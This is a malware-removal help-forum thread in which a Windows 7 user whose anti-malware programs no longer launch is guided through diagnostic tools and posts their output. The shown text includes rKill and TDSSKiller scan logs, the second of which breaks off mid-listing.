Pests of all kinds and how to fight them: Anti-malware programs no longer start (Windows 7)
01.10.2017, 18:20 | #1 |
Anti-malware programs no longer start

Hello everyone,

as described in the title, suddenly neither Malwarebytes nor Windows Defender will start on my machine. No error messages at all; the programs simply don't come up, and there is no entry in Task Manager. Until now these programs ran without problems. I wanted to run Malwarebytes today for the reasons given below. I have an HP laptop with Win 7 Pro, 64-bit, with 8 GB RAM and 4 processors.

Perhaps also the following info: What I actually want/wanted to do is fix a microphone fault. For a few days my mic has been switching itself off arbitrarily, at varying intervals. No matter which application: Skype, TeamViewer, Zoom. No matter which settings and driver updates I apply. In a forum I got the tip to have Malwarebytes scan for rootkits (what is that?). That is when I noticed that I cannot start Malwarebytes. Then I began to suspect that the mic fault might possibly be related to this as well.

Possibly another hint: For a few (~3) days I have also been unable to log in to my router (GigaCube). Name/password are suddenly rejected although I have neither done a reset nor changed the login. Maybe not relevant. Could also be down to the router.

I have just reinstalled Malwarebytes. Everything was OK during installation, but afterwards I cannot open it (as admin). After clicking the shortcut, or the .exe directly in the directory, the machine churns for a bit and that's it. No window, no way to start a scan, no error message. The same behaviour with Defender. *sigh*

Many thanks in advance
Christian

Last edited by ranxero (01.10.2017 at 18:57)
01.10.2017, 20:11 | #2 |
/// TB-Ausbilder | Anti-malware programs no longer start

My name is Matthias and I will help you clean up your computer. To make the cleanup as effective and fast as possible, please observe the following notes:

Please work through all steps one after another in the given order and post all log files in CODE tags: How it works: Posting in CODE tags. Attaching the log files, or even packing them into a ZIP, RAR or 7Z archive beforehand, makes your helper's work massively harder, unless of course the file would otherwise be too large for the forum. To put the log files in a CODE box, proceed as follows:

Thank you for your cooperation!

Step 0
Please download rKill by Grinler to your desktop from one of the following links: RKill or http://www.trojaner-board.de/85629-rkill-download.html

Step 1
Please download the appropriate version of Farbar's Recovery Scan Tool to your desktop: FRST 32-Bit | FRST 64-Bit (If you are not sure: download both versions, or check under Start > Computer (right-click) > Properties)

Step 2
Please download TDSSKiller.exe and save this file on the desktop

Please post with your next reply
|
01.10.2017, 20:25 | #3 |
Anti-malware programs no longer start

First of all, many thanks for your help.

Here is the rkill log ... the other steps will follow as soon as they are done.

Code:
Rkill 2.9.1 by Lawrence Abrams (Grinler)
hxxp://www.bleepingcomputer.com/
Copyright 2008-2017 BleepingComputer.com
More Information about Rkill can be found at this link:
 hxxp://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 10/01/2017 09:17:26 PM in x64 mode.
Windows Version: Windows 7 Professional Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * C:\Windows\system32\valWBFPolicyService.exe (PID: 2588) [WD-HEUR]

1 proccess terminated!

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * No issues found.

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * HOSTS file entries found:

  127.0.0.1 stockparser
  127.0.0.1 code-sales.localhost
  127.0.0.1 joomla360.localhost
  127.0.0.1 dani.localhost
  127.0.0.1 three83.localhost
  127.0.0.1 threemotion.localhost
  127.0.0.1 threeegoshooter.localhost
  127.0.0.1 phalcon-devtools.localhost
  127.0.0.1 phalcon.localhost
  127.0.0.1 cakephp334.localhost
  127.0.0.1 Pruefung2.localhost
  127.0.0.1 xmlrpc.localhost
  127.0.0.1 laraveloctobercms.localhost
  127.0.0.1 laravelbootstrapcms.localhost
  127.0.0.1 laravelitecms.localhost
  127.0.0.1 typo3-876
  127.0.0.1 typo3-7621
  127.0.0.1 node-cluster-test

Program finished at: 10/01/2017 09:23:35 PM
Execution time: 0 hours(s), 6 minute(s), and 8 seconds(s)
01.10.2017, 20:31 | #4 |
/// TB-Ausbilder | Anti-malware programs no longer start

Ok
01.10.2017, 20:34 | #5 |
Anti-malware programs no longer start

I cannot carry out step #1 because, as described in the other post, when I click the link the browser is closed immediately and the machine is restarted. Really! No bluescreen, just a brief "software access violation ... XYZ blah blah" message, then a normal restart. I have already tried downloading other files, e.g. MalwareBytes, no problems there.
01.10.2017, 20:37 | #6 |
/// TB-Ausbilder | Anti-malware programs no longer start

Hi, which AV program do you have installed? Deactivate/uninstall it beforehand... maybe it will work then.
02.10.2017, 17:27 | #7 |
Anti-malware programs no longer start

I don't have an AV program, only Windows Firewall, and I run MB regularly. That has been running without problems for about 2-3 years.

edit: Just tried it again: Firefox -> click on link -> browser closes -> machine restarts. This time with 3 error dialogs, which however disappear so quickly that I can't make anything out. No bluescreen ... oh dear.

Should I carry out the last step #2 anyway?

I guess that meant 'yes'.

Step #2 logfile

Code:
21:56:54.0411 0x1a10 [ 785F474FB5E67E448E1931C98E8D0ABC, 911697D580CBF508A6F4A52D4F95A6976CF9A0EC3549076A8D0B5C8BD947C989 ] FontCache C:\Windows\system32\FntCache.dll 21:56:54.0602 0x1a10 FontCache - ok 21:56:54.0690 0x1a10 [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe 21:56:54.0775 0x1a10 FontCache3.0.0.0 - ok 21:56:54.0825 0x1a10 [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends C:\Windows\system32\drivers\FsDepends.sys 21:56:54.0940 0x1a10 FsDepends - ok 21:56:54.0968 0x1a10 [ 6BD9295CC032DD3077C671FCCF579A7B, 83622FBB0CB923798E7E584BF53CAAF75B8C016E3FF7F0FA35880FF34D1DFE33 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys 21:56:55.0003 0x1a10 Fs_Rec - ok 21:56:55.0065 0x1a10 [ 8F6322049018354F45F05A2FD2D4E5E0, 73BF0FB4EBD7887E992DDEBB79E906958D6678F8D1107E8C368F5A0514D80359 ] fvevol C:\Windows\system32\DRIVERS\fvevol.sys 21:56:55.0104 0x1a10 fvevol - ok 21:56:55.0136 0x1a10 [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys 21:56:55.0179 0x1a10 gagp30kx - ok 21:56:55.0245 0x1a10 [ E4AE497857409127ED57562AF913A903, 262ADD713B1FBF6200550967D1F8635B55D01BBD8FA2E753536E71A4EC87867B ] gpsvc C:\Windows\System32\gpsvc.dll 21:56:55.0347 0x1a10 gpsvc - ok 21:56:55.0457 0x1a10 [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdate C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 21:56:55.0488 0x1a10 gupdate - ok 21:56:55.0560 0x1a10 [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdatem C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 21:56:55.0587 0x1a10 gupdatem - ok 21:56:55.0647 0x1a10 [ F2523EF6460FC42405B12248338AB2F0, 
B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir C:\Windows\system32\drivers\hcw85cir.sys 21:56:55.0756 0x1a10 hcw85cir - ok 21:56:55.0821 0x1a10 [ 975761C778E33CD22498059B91E7373A, 8304E15FBE6876BE57263A03621365DA8C88005EAC532A770303C06799D915D9 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys 21:56:55.0903 0x1a10 HdAudAddService - ok 21:56:55.0957 0x1a10 [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] HDAudBus C:\Windows\system32\drivers\HDAudBus.sys 21:56:56.0007 0x1a10 HDAudBus - ok 21:56:56.0057 0x1a10 [ 78E86380454A7B10A5EB255DC44A355F, 11F3ED7ACFFA3024B9BD504F81AC39F5B4CED5A8A425E8BADF7132EFEDB9BD64 ] HidBatt C:\Windows\system32\drivers\HidBatt.sys 21:56:56.0181 0x1a10 HidBatt - ok 21:56:56.0201 0x1a10 [ 7FD2A313F7AFE5C4DAB14798C48DD104, 94CBFD4506CBDE4162CEB3367BAB042D19ACA6785954DC0B554D4164B9FCD0D4 ] HidBth C:\Windows\system32\drivers\hidbth.sys 21:56:56.0254 0x1a10 HidBth - ok 21:56:56.0278 0x1a10 [ 0A77D29F311B88CFAE3B13F9C1A73825, 8615DC6CEFB591505CE16E054A71A4F371B827DDFD5E980777AB4233DCFDA01D ] HidIr C:\Windows\system32\drivers\hidir.sys 21:56:56.0322 0x1a10 HidIr - ok 21:56:56.0391 0x1a10 [ BD9EB3958F213F96B97B1D897DEE006D, 4D01CBF898B528B3A4E5A683DF2177300AFABD7D4CB51F1A7891B1B545499631 ] hidserv C:\Windows\system32\hidserv.dll 21:56:56.0488 0x1a10 hidserv - ok 21:56:56.0523 0x1a10 [ 9592090A7E2B61CD582B612B6DF70536, FD11D5E02C32D658B28FCC35688AB66CCB5D3A0A0D74C82AE0F0B6C67B568A0F ] HidUsb C:\Windows\system32\drivers\hidusb.sys 21:56:56.0621 0x1a10 HidUsb - ok 21:56:56.0671 0x1a10 [ 387E72E739E15E3D37907A86D9FF98E2, 9935BE2E58788E79328293AF2F202CB0F6042441B176F75ACC5AEA93C8E05531 ] hkmsvc C:\Windows\system32\kmsvc.dll 21:56:56.0811 0x1a10 hkmsvc - ok 21:56:56.0941 0x1a10 [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] HomeGroupListener C:\Windows\system32\ListSvc.dll 21:56:57.0041 0x1a10 HomeGroupListener 
- ok 21:56:57.0101 0x1a10 [ 908ACB1F594274965A53926B10C81E89, 7D34A742AC486294D82676F8465A3EF26C8AC3317C32B63F62031CB007CFC208 ] HomeGroupProvider C:\Windows\system32\provsvc.dll 21:56:57.0201 0x1a10 HomeGroupProvider - ok 21:56:57.0301 0x1a10 [ 77E81E788CC63E65272A7D247F441505, EA57947495A6FD5B6FCC06AD396AEEEEE44AA5EB924B1A4D71C81B1265120F7B ] HP Support Assistant Service C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe 21:56:57.0331 0x1a10 HP Support Assistant Service - ok 21:56:57.0441 0x1a10 [ 8B8E6BD988EAF18C1B86704BF05E5C03, 84052C116032F3DC47B0D3A7A8FC8E86DF94DDB3136C866D8FC8A3DF23209DEC ] hpdskflt C:\Windows\system32\drivers\hpdskflt.sys 21:56:57.0471 0x1a10 hpdskflt - ok 21:56:57.0571 0x1a10 [ D2946D9F020AE76E9CEF9B4A6DF838C0, C29CE594879385DA12B8EAA90B258905827B613839CCD820DE49215B68676995 ] hpqwmiex C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe 21:56:57.0631 0x1a10 hpqwmiex - ok 21:56:57.0701 0x1a10 [ 39D2ABCD392F3D8A6DCE7B60AE7B8EFC, E9E6A1665740CFBC2DD321010007EF42ABA2102AEB9772EE8AA3354664B1E205 ] HpSAMD C:\Windows\system32\drivers\HpSAMD.sys 21:56:57.0751 0x1a10 HpSAMD - ok 21:56:57.0801 0x1a10 [ 0865F178E272C682B0689F1AA269128D, F8CC23EA339F0C917C3948FF35BEFE10664CCFF8796954898E41F4EC1618E5E1 ] hpsrv C:\Windows\system32\Hpservice.exe 21:56:57.0831 0x1a10 hpsrv - ok 21:56:57.0881 0x1a10 [ 3C5B2067338E4EFDADE94E4A72728F23, 72E21FA1E660F9405A5E39B0F89AB21C60F20BAC13247567EF7139AC130F1897 ] HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe 21:56:57.0911 0x1a10 HPWMISVC - ok 21:56:57.0981 0x1a10 [ CF5C9BD985120781200D35FD445D0BD5, 91B37F595A196542458CBBCDAD80779721D228A7030A34E55995DDBB06649248 ] HTTP C:\Windows\system32\drivers\HTTP.sys 21:56:58.0091 0x1a10 HTTP - ok 21:56:58.0141 0x1a10 [ A5462BD6884960C9DC85ED49D34FF392, 53E65841AF5B06A2844D0BB6FC4DD3923A323FFA0E4BFC89B3B5CAFB592A3D53 ] hwpolicy C:\Windows\system32\drivers\hwpolicy.sys 21:56:58.0171 0x1a10 hwpolicy - ok 21:56:58.0261 
0x1a10 [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys 21:56:58.0471 0x1a10 i8042prt - ok 21:56:58.0531 0x1a10 [ AAAF44DB3BD0B9D1FB6969B23ECC8366, 805AA4A9464002D1AB3832E4106B2AAA1331F4281367E75956062AAE99699385 ] iaStorV C:\Windows\system32\drivers\iaStorV.sys 21:56:58.0571 0x1a10 iaStorV - ok 21:56:58.0661 0x1a10 [ C98A5B9D932430AD8EEBD3EF73756EF7, DF7E1D391A0F3345AD61154363922C27BD557DEEACE395A6A8A8A16BFD1BB9A8 ] idsvc C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe 21:56:58.0721 0x1a10 idsvc - ok 21:56:58.0941 0x1a10 IEEtwCollectorService - ok 21:56:58.0981 0x1a10 [ 5C18831C61933628F5BB0EA2675B9D21, 5CD9DE2F8C0256623A417B5C55BF55BB2562BD7AB2C3C83BB3D9886C2FBDA4E4 ] iirsp C:\Windows\system32\drivers\iirsp.sys 21:56:59.0031 0x1a10 iirsp - ok 21:56:59.0101 0x1a10 [ 344789398EC3EE5A4E00C52B31847946, 3DA5F08E4B46F4E63456AA588D49E39A6A09A97D0509880C00F327623DB6122D ] IKEEXT C:\Windows\System32\ikeext.dll 21:56:59.0170 0x1a10 IKEEXT - ok 21:56:59.0379 0x1a10 [ 01262E2BE97708F54666E700482027DE, 7643FCFB6EBFABDD7D1A914C40FADE97DDC633C5D75BE2CADBAC61675564E5CD ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHD64.sys 21:56:59.0536 0x1a10 IntcAzAudAddService - ok 21:56:59.0597 0x1a10 [ F00F20E70C6EC3AA366910083A0518AA, E2F3E9FFD82C802C8BAC309893A3664ACF16A279959C0FDECCA64C3D3C60FD22 ] intelide C:\Windows\system32\drivers\intelide.sys 21:56:59.0624 0x1a10 intelide - ok 21:56:59.0660 0x1a10 [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] intelppm C:\Windows\system32\drivers\intelppm.sys 21:56:59.0708 0x1a10 intelppm - ok 21:56:59.0739 0x1a10 [ 098A91C54546A3B878DAD6A7E90A455B, 044CCE2A0DF56EBE1EFD99B4F6F0A5B9EE12498CA358CF4B2E3A1CFD872823AA ] IPBusEnum C:\Windows\system32\ipbusenum.dll 21:56:59.0822 0x1a10 IPBusEnum - ok 21:56:59.0860 0x1a10 [ 
C9F0E1BD74365A8771590E9008D22AB6, 728BC5A6AAE499FDC50EB01577AF16D83C2A9F3B09936DD2A89C01E074BA8E51 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys 21:56:59.0951 0x1a10 IpFilterDriver - ok 21:57:00.0041 0x1a10 [ 08C2957BB30058E663720C5606885653, E13EDF6701512E2A9977A531454932CA5023087CB50E1D2F416B8BCDD92B67BE ] iphlpsvc C:\Windows\System32\iphlpsvc.dll 21:57:00.0153 0x1a10 iphlpsvc - ok 21:57:00.0207 0x1a10 [ 0FC1AEA580957AA8817B8F305D18CA3A, 7161E4DE91AAFC3FA8BF24FAE4636390C2627DB931505247C0D52C75A31473D9 ] IPMIDRV C:\Windows\system32\drivers\IPMIDrv.sys 21:57:00.0278 0x1a10 IPMIDRV - ok 21:57:00.0307 0x1a10 [ AF9B39A7E7B6CAA203B3862582E9F2D0, 67128BE7EADBE6BD0205B050F96E268948E8660C4BAB259FB0BE03935153D04E ] IPNAT C:\Windows\system32\drivers\ipnat.sys 21:57:00.0397 0x1a10 IPNAT - ok 21:57:00.0457 0x1a10 [ 3ABF5E7213EB28966D55D58B515D5CE9, A352BCC5B6B9A28805B15CAFB235676F1FAFF0D2394F88C03089EB157D6188AE ] IRENUM C:\Windows\system32\drivers\irenum.sys 21:57:00.0514 0x1a10 IRENUM - ok 21:57:00.0581 0x1a10 [ 2F7B28DC3E1183E5EB418DF55C204F38, D40410A760965925D6F10959B2043F7BD4F68EAFCF5E743AF11AD860BD136548 ] isapnp C:\Windows\system32\drivers\isapnp.sys 21:57:00.0612 0x1a10 isapnp - ok 21:57:00.0654 0x1a10 [ 96BB922A0981BC7432C8CF52B5410FE6, 236C05509B1040059B15021CBBDBDAF3B9C0F00910142BE5887B2C7561BAAFBA ] iScsiPrt C:\Windows\system32\drivers\msiscsi.sys 21:57:00.0707 0x1a10 iScsiPrt - ok 21:57:00.0738 0x1a10 [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] kbdclass C:\Windows\system32\drivers\kbdclass.sys 21:57:00.0792 0x1a10 kbdclass - ok 21:57:00.0837 0x1a10 [ 0705EFF5B42A9DB58548EEC3B26BB484, 86C6824ED7ED6FA8F306DB6319A0FD688AA91295AE571262F9D8E96A32225E99 ] kbdhid C:\Windows\system32\drivers\kbdhid.sys 21:57:00.0886 0x1a10 kbdhid - ok 21:57:00.0905 0x1a10 [ 00A54A6CEDF599AABB72C20E0815BC37, 09835A43E1A17396BDC88BB38EF66EA8854913040347D9893EBF8550D0AA1452 ] KeyIso C:\Windows\system32\lsass.exe 
21:57:00.0938 0x1a10 KeyIso - ok 21:57:00.0983 0x1a10 [ 7635071BC8EDBC8B501F4EF2B0A82820, 276A5672196EF3990FB1A2CE646B6B92241580E1BB96BCCA3CBDC781CF42111A ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys 21:57:01.0023 0x1a10 KSecDD - ok 21:57:01.0052 0x1a10 [ 033937305C234FC8215A4692193AA43E, 1E48CA1F8020F9DA0778A0F39A69C3B918CF878B152A3B38A5D3B9892154B6DB ] KSecPkg C:\Windows\system32\Drivers\ksecpkg.sys 21:57:01.0091 0x1a10 KSecPkg - ok 21:57:01.0158 0x1a10 [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] ksthunk C:\Windows\system32\drivers\ksthunk.sys 21:57:01.0247 0x1a10 ksthunk - ok 21:57:01.0303 0x1a10 [ 6AB66E16AA859232F64DEB66887A8C9C, 5F2B579BEA8098A2994B0DECECDAE7B396E7B5DC5F09645737B9F28BEEA77FFF ] KtmRm C:\Windows\system32\msdtckrm.dll 21:57:01.0400 0x1a10 KtmRm - ok 21:57:01.0472 0x1a10 [ 4891EE13FA79B9D6B856F49AD69281B2, 5A9488BA1798020443400D82BA18D5A3EA766F49C2C78CD417C1DE45F64CD7BA ] L6PODHDBEAN C:\Windows\system32\Drivers\L6PODHDBEAN64.sys 21:57:01.0631 0x1a10 L6PODHDBEAN - ok 21:57:01.0705 0x1a10 [ D9F42719019740BAA6D1C6D536CBDAA6, 8757599D0AE5302C4CE50861BEBA3A8DD14D7B0DBD916FD5404133688CDFCC40 ] LanmanServer C:\Windows\system32\srvsvc.dll 21:57:01.0790 0x1a10 LanmanServer - ok 21:57:01.0819 0x1a10 [ 851A1382EED3E3A7476DB004F4EE3E1A, B1C67F47DD594D092E6E258F01DF5E7150227CE3131A908A244DEE9F8A1FABF9 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll 21:57:01.0898 0x1a10 LanmanWorkstation - ok 21:57:01.0942 0x1a10 [ 1538831CF8AD2979A04C423779465827, E1729B0CC4CEEE494A0B8817A8E98FF232E3A32FB023566EF0BC71A090262C0C ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys 21:57:02.0028 0x1a10 lltdio - ok 21:57:02.0094 0x1a10 [ C1185803384AB3FEED115F79F109427F, 0414FE73532DCAB17E906438A14711E928CECCD5F579255410C62984DD652700 ] lltdsvc C:\Windows\System32\lltdsvc.dll 21:57:02.0206 0x1a10 lltdsvc - ok 21:57:02.0230 0x1a10 [ F993A32249B66C9D622EA5592A8B76B8, 
EE64672A990C6145DC5601E2B8CDBE089272A72732F59AF9865DCBA8B1717E70 ] lmhosts C:\Windows\System32\lmhsvc.dll 21:57:02.0328 0x1a10 lmhosts - ok 21:57:02.0387 0x1a10 [ 1A93E54EB0ECE102495A51266DCDB6A6, DB6AA86AA36C3A7988BE96E87B5D3251BE7617C54EE8F894D9DC2E267FE3255B ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys 21:57:02.0417 0x1a10 LSI_FC - ok 21:57:02.0465 0x1a10 [ 1047184A9FDC8BDBFF857175875EE810, F2251EDB7736A26D388A0C5CC2FE5FB9C5E109CBB1E3800993554CB21D81AE4B ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys 21:57:02.0496 0x1a10 LSI_SAS - ok 21:57:02.0524 0x1a10 [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93, 88D5740A4E9CC3FA80FA18035DAB441BDC5A039622D666BFDAA525CC9686BD06 ] LSI_SAS2 C:\Windows\system32\drivers\lsi_sas2.sys 21:57:02.0544 0x1a10 LSI_SAS2 - ok 21:57:02.0594 0x1a10 [ 0504EACAFF0D3C8AED161C4B0D369D4A, 4D272237C189646F5C80822FD3CBA7C2728E482E2DAAF7A09C8AEF811C89C54D ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys 21:57:02.0639 0x1a10 LSI_SCSI - ok 21:57:02.0663 0x1a10 [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] luafv C:\Windows\system32\drivers\luafv.sys 21:57:02.0735 0x1a10 luafv - ok 21:57:02.0806 0x1a10 [ 25FAEF6CCFF6D9912A65641AE60711EB, AD83C6DE72D7C416EC7765DBA2EF41B32084980EE071A17CA2C360CDF91212AE ] MBAMChameleon C:\Windows\system32\drivers\MBAMChameleon.sys 21:57:02.0846 0x1a10 MBAMChameleon - ok 21:57:03.0083 0x1a10 [ 4988F9AEE3B9E4545975CAA9381DB0EF, DC6030468783BF02DAA6922A5469D73D56642963F7212398A959AD7915D9E76B ] MBAMFarflt C:\Windows\system32\DRIVERS\farflt.sys 21:57:03.0113 0x1a10 MBAMFarflt - ok 21:57:03.0143 0x1a10 [ 149E252142950594695178971748D056, 6F3EBAD6CB87A21B457AA09CA56EF01B48D4478CB94BD09834E72BE9A41265A4 ] MBAMProtection C:\Windows\system32\drivers\mbam.sys 21:57:03.0169 0x1a10 MBAMProtection - ok 21:57:03.0571 0x1a10 [ FEAF4E98C93BC3512B8108D2F534A3BA, 6D93EF21DB9BFFACC1241E823F9BB7719B9395D64BBF952874CFF015B7930D92 ] MBAMService C:\Program 
Files\Malwarebytes\Anti-Malware\mbamservice.exe 21:57:03.0778 0x1a10 MBAMService - ok 21:57:03.0909 0x1a10 [ 94FCA94EE7937EA3ED75F39DE4C8E292, CD41ACBC70412B61C844ADC26413728A09D60983A464327A285C80E08D37F8B6 ] MBAMSwissArmy C:\Windows\system32\drivers\MBAMSwissArmy.sys 21:57:03.0939 0x1a10 MBAMSwissArmy - ok 21:57:03.0999 0x1a10 [ 530382A92353754F22DF0183D6A74BF8, B193668DFAD72D71EDA02A91E13A2B17322803F8F08FD737101A5951580D7DB3 ] MBAMWebProtection C:\Windows\system32\drivers\mwac.sys 21:57:04.0029 0x1a10 MBAMWebProtection - ok 21:57:04.0109 0x1a10 [ 0BE09CD858ABF9DF6ED259D57A1A1663, 2FD28889B93C8E801F74C1D0769673A461671E0189D0A22C94509E3F0EEB7428 ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll 21:57:04.0149 0x1a10 Mcx2Svc - ok 21:57:04.0319 0x1a10 [ 7CF1B716372B89568AE4C0FE769F5869, 0D70A7A594BCFBB26D7249C0F4B0AF9EF874F2318B3FDCE44648CC61279594ED ] MDM C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe 21:57:04.0361 0x1a10 MDM - detected UnsignedFile.Multi.Generic ( 1 ) 21:57:05.0055 0x1a10 Detect skipped due to KSN trusted 21:57:05.0055 0x1a10 MDM - ok 21:57:05.0095 0x1a10 [ A55805F747C6EDB6A9080D7C633BD0F4, 2DA0E83BF3C8ADEF6F551B6CC1C0A3F6149CDBE6EC60413BA1767C4DE425A728 ] megasas C:\Windows\system32\drivers\megasas.sys 21:57:05.0131 0x1a10 megasas - ok 21:57:05.0163 0x1a10 [ BAF74CE0072480C3B6B7C13B2A94D6B3, 85CBB4949C090A904464F79713A3418338753D20D7FB811E68F287FDAC1DD834 ] MegaSR C:\Windows\system32\drivers\MegaSR.sys 21:57:05.0223 0x1a10 MegaSR - ok 21:57:05.0283 0x1a10 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] MMCSS C:\Windows\system32\mmcss.dll 21:57:05.0363 0x1a10 MMCSS - ok 21:57:05.0433 0x1a10 [ 800BA92F7010378B09F9ED9270F07137, 94F9AF9E1BE80AE6AC39A2A74EF9FAB115DCAACC011D07DFA8D6A1DDC8A93342 ] Modem C:\Windows\system32\drivers\modem.sys 21:57:05.0523 0x1a10 Modem - ok 21:57:05.0543 0x1a10 [ B03D591DC7DA45ECE20B3B467E6AADAA, 
701FB0CAD8138C58507BE28845D3E24CE269A040737C29885944A0D851238732 ] monitor C:\Windows\system32\DRIVERS\monitor.sys 21:57:05.0593 0x1a10 monitor - ok 21:57:05.0633 0x1a10 [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys 21:57:05.0663 0x1a10 mouclass - ok 21:57:05.0703 0x1a10 [ D3BF052C40B0C4166D9FD86A4288C1E6, 5E65264354CD94E844BF1838CA1B8E49080EFA34605A32CF2F6A47A2B97FC183 ] mouhid C:\Windows\system32\drivers\mouhid.sys 21:57:05.0763 0x1a10 mouhid - ok 21:57:05.0831 0x1a10 [ 072D8646E23ECF8A3F5F0157017B4DB6, EBFB1459ECC5AF94C94FB49CEBC724542612680F0777E24B5AA6E062C0EE5D94 ] mountmgr C:\Windows\system32\drivers\mountmgr.sys 21:57:05.0871 0x1a10 mountmgr - ok 21:57:05.0933 0x1a10 [ 0EACD4459D14FBB121A0F8202F170225, 6C63A3D69D6A44E6E03863D2256A5C6EF2DCA56B18DC90B8F3AE8C8DF5D303EF ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe 21:57:05.0993 0x1a10 MozillaMaintenance - ok 21:57:06.0093 0x1a10 [ 3665AB2F67F4024F5F3F80335ED5322A, BE3DC246F176E00D7611A7E16FBC22615199F49EBCB4C90B0C107294E592BF8D ] MpFilter C:\Windows\system32\DRIVERS\MpFilter.sys 21:57:06.0135 0x1a10 MpFilter - ok 21:57:06.0191 0x1a10 [ A44B420D30BD56E145D6A2BC8768EC58, B1E4DCA5A1008FA7A0492DC091FB2B820406AE13FD3D44F124E89B1037AF09B8 ] mpio C:\Windows\system32\drivers\mpio.sys 21:57:06.0266 0x1a10 mpio - ok 21:57:06.0322 0x1a10 [ 6C38C9E45AE0EA2FA5E551F2ED5E978F, 5A3FA2F110029CB4CC4384998EDB59203FDD65EC45E01B897FB684F8956EAD20 ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys 21:57:06.0381 0x1a10 mpsdrv - ok 21:57:06.0461 0x1a10 [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] MpsSvc C:\Windows\system32\mpssvc.dll 21:57:06.0601 0x1a10 MpsSvc - ok 21:57:06.0658 0x1a10 [ 98DB1790F0A584E0A2528B92B052417F, 9AA04CA73AFE599810CD233B9CEC212E16D44DCEDF5C7D0181C7257F498068B5 ] MRxDAV 
C:\Windows\system32\drivers\mrxdav.sys 21:57:06.0769 0x1a10 MRxDAV - ok 21:57:06.0803 0x1a10 [ F77E8ABD746B93B9B4F9C13250302C47, 7A6B705DCFA540E90A2A10F8B245CFF7BCB018152EF67D4B988366386E67AE10 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys 21:57:06.0863 0x1a10 mrxsmb - ok 21:57:06.0934 0x1a10 [ FF1B4AF370481C25B078FEAEE5455EDC, 596DE4DB5B29F99CD89038B9426000E42D47A27FEF56135F219C83F94B10C1E5 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys 21:57:07.0002 0x1a10 mrxsmb10 - ok 21:57:07.0024 0x1a10 [ 125B7C9D7372711EDBD5BFEE2E33CE60, 53ED38EBD558C1EE46EE0D3E39964730237991994946BE494806F7EC4A62D966 ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys 21:57:07.0064 0x1a10 mrxsmb20 - ok 21:57:07.0094 0x1a10 [ C25F0BAFA182CBCA2DD3C851C2E75796, 643E158A0948DF331807AEAA391F23960362E46C0A0CF6D22A99020EAE7B10F8 ] msahci C:\Windows\system32\drivers\msahci.sys 21:57:07.0134 0x1a10 msahci - ok 